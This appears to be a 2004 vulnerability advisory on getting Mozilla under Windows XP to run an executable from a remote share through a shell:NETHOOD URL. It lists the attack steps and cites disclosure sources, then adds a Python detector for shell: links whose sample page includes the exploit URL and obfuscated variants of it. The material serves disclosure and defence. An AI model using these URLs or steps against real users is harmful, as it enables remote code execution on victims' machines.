Shell code for remotely running an executable program

[START] Advisory

TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709

PROCESS
-------
Victim visits a shared folder named "shared" on a server named "X-6487ohu4s6x0p".
This will create a shortcut named "shared on X-6487ohu4s6x0p" in the folder at "shell:NETHOOD".
Finally, make MOZILLA request the following URL:
shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe
A file named "fileid.exe" in the "shared" folder will be executed.

REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.

WINDOWS supports "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research, and Cheng Peng Su for his original discovery.

######################### [START] PROOF OF CONCEPT #######################
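
A defensive check for the URL form in the PROCESS section above, added here as an example and not part of the original advisory or its proof of concept: it scans HTML for attributes whose URL uses the shell: scheme, so such pages can be flagged or filtered. The function names, the attribute list, the normalisation rule and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes whose value a browser may load or navigate to (assumed list).
URL_ATTRS = {"href", "src", "action", "data", "background"}
# Whitespace/control chars are dropped before the scheme is compared (conservative).
STRIP = re.compile(r"[\x00-\x20]+")
META_URL = re.compile(r"url\s*=\s*['\"]?([^'\">]+)", re.I)

def shell_target(url):
    """Return the path after 'shell:' if url uses that scheme, else None."""
    scheme, sep, rest = url.partition(":")
    if sep and STRIP.sub("", scheme).lower() == "shell":
        return rest.strip()
    return None

class ShellLinkFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []  # (tag, attribute, target)

    def handle_starttag(self, tag, attrs):
        # HTMLParser has already decoded character references such as &#83;.
        for name, value in attrs:
            value = value or ""
            if tag == "meta" and name == "content":
                m = META_URL.search(value)  # <meta http-equiv="refresh">
                value = m.group(1) if m else ""
            elif name not in URL_ATTRS:
                continue
            target = shell_target(value)
            if target is not None:
                self.hits.append((tag, name, target))

def find_shell_links(html):
    finder = ShellLinkFinder()
    finder.feed(html)
    finder.close()
    return finder.hits

# Constructed sample page; the first URL is the form given in the advisory.
SAMPLE = r"""
<a href="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe">1</a>
<a href=" &#83;HELL:NETHOOD\x\y.exe">2</a>
<meta http-equiv="refresh" content="0; url=shell:NETHOOD\x\y.exe">
<a href="/docs/shell:notes.html">relative path, not a scheme</a>
"""

if __name__ == "__main__":
    print(find_shell_links(SAMPLE))
```

The relative link in the sample is not reported, because "shell:" there is part of a path and not the URL scheme.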